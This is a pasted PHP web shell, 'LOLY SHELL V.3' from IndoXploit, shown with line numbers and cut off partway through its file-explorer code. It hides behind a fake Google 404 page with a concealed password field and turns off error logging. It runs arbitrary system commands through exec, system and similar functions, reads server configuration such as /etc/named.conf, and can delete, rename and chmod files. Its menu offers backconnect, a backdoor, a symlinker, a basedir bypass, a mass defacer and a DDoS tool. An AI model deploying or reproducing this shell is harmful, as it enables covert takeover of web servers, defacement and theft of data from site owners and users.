· 7 years ago · Oct 15, 2018, 11:14 AM
1<?php
2error_reporting(0);
3/*
4
5Coded By FirmanCyb#erLoly_ IndoXploit
6FirmanCyb#erLoly_ V.3 Shell
7*/
8$auth_pass = "@loly"; // Put your password here.
9@session_start();
10function Login() {
11 die("<title>404 Not Found</title>
12 <style>
13 *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(data:image/png;base64,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) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}
14 </style>
15 <a href=//www.google.com/><span id=logo aria-label=Google></span></a>
16 <p><b>File Not Found</b> <ins>This website error</ins>
17 <p>The requested URL <code></code> was not found on this server. <ins>Please find again</ins>
18 <style>
19 input { margin:0;background-color:#fff;border:1px solid #fff; }
20 </style>
21 <pre align=center>
22 <form method=post>
23 <input type=password name=pass>
24 </form></pre>");
25}
26if(!isset($_SESSION[$_SERVER['HTTP_HOST']]))
27if( empty($auth_pass) || ( isset($_POST['pass']) && ($_POST['pass'] == $auth_pass) ) )
28 $_SESSION[$_SERVER['HTTP_HOST']] = true;
29 else
30 Login();
31$db = "";
32ob_start();
33if(!isset($_GET['action']) or $_GET['action']==""){
34
35
36 header("location: ?action=explorer");
37
38
39}
40if(isset($_GET["hiddenshell"])){
41
42exit;}
43@ini_set('error_log',NULL);
44@ini_set('log_errors',0);
45@ini_set('max_execution_time',0);
46@set_time_limit(0);
47@set_magic_quotes_runtime(0);
48if(get_magic_quotes_gpc()) {
49 function mstripslashes($array) {
50 return is_array($array) ? array_map('mstripslashes', $array) : stripslashes($array);
51 }
52 $_POST = mstripslashes($_POST);
53}
54
55if(ini_get("safe_mode")=="1"){
56 $safemode="<font>ON</font>";
57} else{
58 $safemode="<font>OFF</font>";
59}
60if(ini_get("disable_functions")==""){
61 $disable_functions="<font>NONE</font>";
62} else{
63 $disable_functions=ini_get("disable_functions");
64}
65if(!function_exists('posix_getegid'))
66{
67$gid = @getmygid();
68$group = "?";
69} else
70{
71$uid = @posix_getpwuid(posix_geteuid());
72$gid = @posix_getgrgid(posix_getegid());
73$group = $gid['name'];
74$gid = $gid['gid'];
75}
76
77//Start
78
79$on="<font> ON </font>";
80$of="<font> OFF </font>";
81$none="<font> NONE </font>";
82if(function_exists('curl_version'))
83$curl=$on;
84else
85$curl=$of;
86if(function_exists('mysql_get_client_info'))
87$mysql=$on;
88else
89$mysql=$of;
90if(function_exists('mssql_connect'))
91$mssql=$on;
92else
93$mssql=$of;
94if(function_exists('pg_connect'))
95$pg=$on;
96else
97$pg=$of;
98if(function_exists('oci_connect'))
99$or=$on;
100else
101$or=$of;
102if(@ini_get('open_basedir'))
103$open_b=@ini_get('open_basedir');
104else
105$open_b=$none;
106
107//End
108
109function magicboom($text){
110 if (!get_magic_quotes_gpc()){
111 return $text;
112 }
113 return stripslashes($text);
114 }
115
116function perms($p) {
117if (($p & 0xC000) == 0xC000)$i = 's';
118elseif (($p & 0xA000) == 0xA000)$i = 'l';
119elseif (($p & 0x8000) == 0x8000)$i = '-';
120elseif (($p & 0x6000) == 0x6000)$i = 'b';
121elseif (($p & 0x4000) == 0x4000)$i = 'd';
122elseif (($p & 0x2000) == 0x2000)$i = 'c';
123elseif (($p & 0x1000) == 0x1000)$i = 'p';
124else $i = 'u';
125$i .= (($p & 0x0100) ? 'r' : '-');
126$i .= (($p & 0x0080) ? 'w' : '-');
127$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
128$i .= (($p & 0x0020) ? 'r' : '-');
129$i .= (($p & 0x0010) ? 'w' : '-');
130$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
131$i .= (($p & 0x0004) ? 'r' : '-');
132$i .= (($p & 0x0002) ? 'w' : '-');
133$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
134return $i;
135}
136function permsColor($f) {
137 if (!@is_readable($f))
138 return '<font color=#FF0000>' . perms(@fileperms($f)) . '</font>';
139 elseif (!@is_writable($f))
140 return '<font color=white>' . perms(@fileperms($f)) . '</font>';
141 else
142 return '<font color=#25ff00>' . perms(@fileperms($f)) . '</font>';
143}
144function size($s) {
145if($s >= 1073741824)
146return sprintf('%1.2f', $s / 1073741824 ). ' GB';
147elseif($s >= 1048576)
148return sprintf('%1.2f', $s / 1048576 ) . ' MB';
149elseif($s >= 1024)
150return sprintf('%1.2f', $s / 1024 ) . ' KB';
151else
152return $s . ' B';
153}
154function extension($in) {
155$out = '';
156if (function_exists('exec')) {
157@exec($in,$out);
158$out = @join("\n",$out);
159} elseif (function_exists('passthru')) {
160ob_start();
161@passthru($in);
162$out = ob_get_clean();
163} elseif (function_exists('system')) {
164ob_start();
165@system($in);
166$out = ob_get_clean();
167} elseif (function_exists('shell_exec')) {
168$out = shell_exec($in);
169} elseif (is_resource($f = @popen($in,"r"))) {
170$out = "";
171while(!@feof($f))
172$out .= fread($f,1024);
173pclose($f);
174}
175return $out;
176}
177if (strtolower(substr(PHP_OS,0,3))=="win")
178$sys='win';
179else
180$sys='unix';
181$home_path = @getcwd();
182$path = @getcwd();
183
184if(empty($_GET['dir'])){
185
186$path=(dirname($_SERVER['SCRIPT_FILENAME']));
187} else{
188 $path=(htmlspecialchars($_GET['dir']));
189}
190if($sys == 'win')
191{
192$home_path = str_replace("\\", "/", $home_path);
193$path = str_replace("\\", "/", $path);
194}
195
196if($path[strlen($path)-1] != '/' )
197$path .= '/';
198$cwd_links = '';
199$path1 = explode("/", $GLOBALS['path']);
200$n=count($path1);
201for($i=0; $i<$n-1; $i++) {
202$cwd_links .= "<a href='?action=explorer&dir=";
203for($j=0; $j<=$i; $j++)
204$cwd_links .= $path1[$j].'/';
205$cwd_links .= "'>".$path1[$i]."/</a>";
206}
207
208$drives = "";
209
210if (class_exists('COM')) {
211
212foreach(range('C','Z') as $drive) {
213if(is_dir($drive.':\\')){
214$fso = new COM('Scripting.FileSystemObject');
215$D = $fso->Drives;
216$Dr = $fso->GetDrive($drive);
217if ($Dr->IsReady ) {
218$drives .= '<a href="?action=explorer&dir='.$drive.":".'">[ '.$drive.' ]</a> ';
219}
220else {
221$drives .= '<a href="?action=explorer&dir='.$drive.":".'">[ CD-Rom : '.$drive.' ]</a> ';
222}
223}
224}
225
226}
227
228if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
229function posix_getpwuid($p) {return false;} }
230if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
231function posix_getgrgid($p) {return false;} }
232?>
233<!DOCTYPE HTML>
234<html>
235 <head>
236 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
237 <link href="https://s33.postimg.cc/ry7gh0vq7/lc_In_P8_H.png" rel="icon" type="image/x-icon"/>
238 <title> LOLY SHELL V.3 </title>
239 <title><?php echo $_SERVER['HTTP_HOST']; ?> - LOLY SHELL V.3</title>
240<style>
241body
242{
243 background:#1d1c1c;
244 color:#e3e3e3;
245 font-family:Tahoma;
246}
247h1,h2,h3,h4,h5,h6
248{
249 margin:0px;
250 padding:0px;
251}
252a
253{
254 text-decoration: none;
255 color:inherit;
256}
257li
258{
259 list-style:none;
260}
261ul
262{
263 padding:0px ;
264 margin:0px auto;
265}
266textarea{
267 border:2px solid #CE3F3F;
268}
269#hover tr:hover{
270 background-color:#CE3F3F;
271}
272.logo
273{
274 background-image:url('http://ashiyane.org/aboutus/images/logo2.png');
275 width:182px;
276 height:134px;
277 float:left;
278}
279.main
280{
281 width:90%;
282 margin:0px auto;
283 padding:0px;
284}
285.logout
286{
287 float:right;
288 background:#990000;
289 color:#FFF;
290 background-image:url('http://up.ashiyane.org/images/b5crr7rhrwc5e97nvgxq.png');
291 padding:5px;
292 padding-left:20px;
293 background-position:2px;
294 background-repeat: no-repeat;
295
296}
297.description
298{
299 width: 70%;
300 float: left;
301 margin-left:20px;
302 margin-top:10px;
303}
304.description span
305{
306 font-size:12px;
307}
308.description span b
309{
310 color:#DD4242;
311}
312.header
313{
314 width: 95%;
315 margin-left: auto;
316 margin-right: auto;
317}
318.header h1
319{
320 padding: 0px;
321 margin: 0px;
322 text-align: center;
323 border-bottom: 3px solid #A81F1F;
324}
325.clear
326{
327 clear: both;
328}
329
330.menu
331{
332
333 margin-top:10px;
334}
335.menu ul
336{
337
338 width:95%;
339 margin-left:3%;
340
341
342}
343.menu ul li:last-child
344{
345 border-right:none;
346}
347.menu ul li
348{
349 border-top: 3px solid #A81F1F;
350 background-color:#ce3f3f;
351 text-align:center;
352 float:left;
353 border-right:3px solid #a81f1f;
354 padding:10px 0px;
355 width:8%;
356 font-size:12px;
357
358}
359.content-box
360{
361 font-size:13px;
362 background-color:#2D2D2D;
363 margin-top:10px;
364 width:94%;
365 margin-left:auto;
366 margin-right:auto;
367}
368.box-main-box
369{
370 padding:10px;
371 overflow-x:hidden;
372}
373.content-box table
374{
375 text-align: left;
376}
377.content-box table tr th
378{
379 color:#BE5757;
380}
381.content-box table tr:nth-child(2n)
382{
383 background-color:#464444;
384}
385.box-box
386{
387 float:left;
388
389 width:45%;
390 margin-top:10px;
391 padding:5px;
392}
393.box-box .title
394{
395 color:#BE5757;
396 border-bottom:2px solid #BE5757;
397 padding-bottom:3px;
398 float:left;
399 margin-bottom: 10px;
400}
401input[type="file"],input[type=text]
402{
403 border-radius: 3px;
404 padding:2px;
405 color: black;
406}
407
408input[type=submit],input[type=reset]
409{
410 background-color: #E44242;
411 color: #FFF;
412 border: none;
413 padding: 5px;
414 border-radius: 3px;
415 margin-left:5px;
416 cursor: pointer;
417}
418input[type=button] {
419 background-color: #E44242;
420 color: #FFF;
421 border: none;
422 padding: 5px;
423 border-radius: 3px;
424 margin-left:5px;
425 cursor: pointer;
426 }
427.info-file-info li
428{
429 background:rgb(152, 134, 109);
430 float:left;
431 margin-right:10px;
432 padding:5px;
433 margin-top:10px;
434}
435.info-file-info li.active
436{
437 background:rgb(163, 95, 95);
438}
439.syms td{
440border:1px solid #A81F1F;
441}
442.syms tr:hover{
443background: #646464;
444}
445textarea{
446padding:10px 10px;
447background-color:#ddd;
448}
449.backdoor li{
450 background-color: #CE3F3F;
451 text-align: center;
452 border: 1px solid #A81F1F;
453 padding: 10px 0px;
454 font-size: 12px;
455}
456.backdoor a li{
457 color:white;
458}
459.backdoor li{
460 color:black;
461}
462</style>
463
464 </head>
465 <title> LOLY SHELL V.3 </title>
466 <body>
467 <div class="main">
468 <div class="header">
469 <h1>LOLY SHELL V.3<span style="font-size: 12px; color: #CE3F3F;">Lolyconsz</span></h1>
470 <div class="logo"></div>
471
472 <div class="description">
473 <span style=""><b>Server IP : </b> <?php echo $_SERVER['SERVER_ADDR']; ?></span>
474 <span style=""><b>Your IP : </b> <?php echo $_SERVER['REMOTE_ADDR']; ?></span><br>
475 <span style=""><b>System : </b> <?php echo php_uname(); ?></span><br>
476 <span style=""><b>Software : </b> <?php echo getenv("SERVER_SOFTWARE"); ?></span>
477 <span style=""><b>User: </b><?php echo get_current_user()." "; ?></span><span>Group: <?php echo $gid ." [ $group ] ";?></span><br />
478 <span style=""><b>Safemode : </b><?php echo $safemode; ?></span>
479 <span style=""><b>Disable_Functions: </b><?php echo $disable_functions; ?></span><br />
480 <span><b>Open_Basedir : </b><?php echo $open_b;?></span><BR />
481 <span><b>CURL:</b><?php echo $curl; ?><span><b>MySQL:</b></span><?php echo $mysql; ?><span><b>MsSQL:</b></span><?php echo $mssql; ?><span><b>PostgreSQL:</b></span><?php echo $pg?><span><b>Oracle:</b></span><?php echo $or?></span><br />
482 <span><b>Domains:</b></span>
483 <?php
484 if($GLOBALS['sys']=='unix')
485 {
486 $d0mains = @file("/etc/named.conf");
487 if(!$d0mains)
488 {
489 echo "<span>CANT READ named.conf</span>";
490 }
491 else
492 {
493 $count;
494 foreach($d0mains as $d0main)
495 {
496 if(@ereg("zone",$d0main))
497 {
498 preg_match_all('#zone "(.*)"#', $d0main, $domains);
499 flush();
500 if(strlen(trim($domains[1][0])) > 2){
501 flush();
502 $count++;
503 }
504 }
505 }
506 echo "<span>$count Domains</span>";
507 }
508 }
509 else{ echo"<span>CANT READ |Windows|</span>";}
510 ?>
511 <br />
512 <?php
513 echo '<tr>
514<td height="12"><span><b>Path:</b></span></td>
515<td colspan="2"><span>'.$cwd_links.' <a href="?action=explorer&dir='.$GLOBALS['home_path'].'"><font color=#DD4242 >| Home Directory |</font></a></span></td>
516</tr>';
517 ?><br />
518 <span style=""><?php echo $drives; ?></span><br />
519 <br />
520 </div>
521 <div class="logout"><a href="?action=logout">Logout</a></div>
522 <div class="clear"></div>
523
524</div>
525<div class="menu">
526 <ul>
527 <li id="explorer"><a href="?action=explorer&dir=<?php echo $path ?>">HOME</a></li>
528 <li id="terminal"><a href="?action=terminal&dir=<?php echo $path ?>">TERMINAL</a></li>
529 <li id="eval"><a href="?action=eval&dir=<?php echo $path ?>">EVAL</a></li>
530 <li id="sym"><a href="?action=sym&dir=<?php echo $path ?>">SYMLINKER</a></li>
531 <li id="basedir"><a href="?action=basedir&dir=<?php echo $path ?>">OPEN BASEDIR</a></li>
532 <li id="sql"><a href="?action=sql&dir=<?php echo $path ?>">SQL</a></li>
533 <li id="cgiashiyane"><a href="?action=cgiashiyane&dir=<?php echo $path ?>">CGI-TELNET</a></li>
534 <li id="bc"><a href="?action=bc&dir=<?php echo $path ?>">BACKCONNECT</a></li>
535 <li id="backdoor"><a href="?action=backdoor&dir=<?php echo $path ?>">BACKDOOR</a></li>
536 <li id="othertools"><a href="?action=othertools&dir=<?php echo $path ?>" title="Other Tools:
537 Zone-h Mass Deface Poster
538 Ddoser
539 SQLi Target Finder
540 Mass Defacer
541 Zipper
542 Fake Mail
543 PHP To XML
544 Bypass Disable Functions
545 Hash Cracker
546 PHP Info">OTHER TOOLS</a></li>
547 <li id="aboutus"><a href="?action=aboutus&dir=">ABOUTUS</a></li>
548 <li id="rmshell"><a href="?action=rmshell">REMOVE</a></li>
549 </ul>
550 </div>
551
552 <div class="clear"></div>
553 <div class="content-box">
554 <div class="box-main-box">
555<?php
556
557if(isset($_GET['action'])){
558
559 $action=htmlspecialchars($_GET['action']);
560
561 if($action=="explorer"){
562
563 if(!function_exists("scandir")) {
564 function scandir($dir) {
565 $dh = opendir($dir);
566 while (false !== ($filename = readdir($dh)))
567 $files[] = $filename;
568 return $files;
569 }
570}
571
572 echo "<style>#explorer{background: #A81F1F}</style>";
573 ?>
574 <br />
575 <div class="explorer">
576 <?php
577
578 $files = scandir($path);
579 ?>
580 <table id="hover">
581 <th style="min-width:300px;">Name</th><th style="width:150px;">Size</th><th style="min-width:300px;">Modify</th><th style="width:300px;">Owner/Group<th style="width:150px;">Permission</th><th colspan=4>Actions</th>
582 <?php
583 $directories = array();
584 $files_list = array();
585
586 foreach($files as $entry){
587 $entry_link=$path.$entry;
588 $entry_link= ($entry_link);
589 if(!is_file($entry_link)){
590 $directories[] = $entry;
591
592
593 } else {
594 $files_list[] = $entry;
595
596 }
597
598 }
599
600
601 ?>
602
603
604 <?php
605 foreach($directories as $directory){
606 $entry_link=$path.$directory;
607 $entry_link= ($entry_link);
608 if($directory==".."){
609 ?>
610 <tr><td style="min-width:300px;"><?php
611 $entry_link2=realpath($entry_link);
612 $entry_link2=str_replace("\\","/",$entry_link2);
613 echo "<a href=\"?action=explorer&dir=$entry_link2\">| $directory |</a></td>";
614
615 ?>
616 <td style="width:150px"><?php echo (is_file($entry_link)?size(filesize($entry_link)):'dir');?></td>
617 <td style="min-width:300px;">
618
619 <?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $entry_link));?>
620
621 </td>
622 <td style="width:300px">
623 <?php
624
625
626 if(strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false){
627 $ow = @posix_getpwuid(@fileowner($entry_link));
628 } else{
629 $ow['name']="???";
630 }
631
632 if(strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false){
633 $gr = @posix_getgrgid(@filegroup($entry_link));
634 }else{
635 $gr['name']="???";
636 }
637
638 echo $ow['name']?$ow['name']:@fileowner($entry_link);
639 echo "/";
640 echo $gr['name']?$gr['name']:@filegroup($entry_link);
641
642
643 ?>
644 <td style="width:150px"><a href="?action=ff&go=perm&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Edit Permission"><?php echo permsColor($entry_link); ?></a></td>
645 <td><a href="?action=ff&go=rename&file=<?php echo urlencode($directory); ?>&dir=<?php echo $path ?>&f=<?php echo $directory;?>#down" title="Rename">R</a></td>
646 <td><a href="?action=ff&go=touch&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Touch">T</a></td>
647 <td><a title="Remove" href="?action=ff&dir=<?php echo $path?>&go=delete&f=<?php echo $entry_link ?>">X</a></td>
648 </tr>
649 <?php
650 }
651 if($directory!="." && $directory!=".."){
652 ?>
653 <tr><td style="min-width:300px;"><?php
654
655echo "<a href=\"?action=explorer&dir=$entry_link\">| $directory |</a></td>";
656
657 ?>
658 <td style="width:150px"><?php echo (is_file($entry_link)?size(filesize($entry_link)):'dir');?></td>
659 <td style="min-width:300px;">
660
661 <?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $entry_link));?>
662
663 </td>
664 <td style="width:300px">
665 <?php
666
667 if(strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false){
668 $ow = @posix_getpwuid(@fileowner($entry_link));
669 } else{
670 $ow['name']="???";
671 }
672
673 if(strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false){
674 $gr = @posix_getgrgid(@filegroup($entry_link));
675 }else{
676 $gr['name']="???";
677 }
678
679 echo $ow['name']?$ow['name']:@fileowner($entry_link);
680 echo "/";
681 echo $gr['name']?$gr['name']:@filegroup($entry_link);
682
683
684 ?>
685 <td style="width:150px"><a href="?action=ff&go=perm&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Edit Permission"><?php echo permsColor($entry_link); ?></a></td>
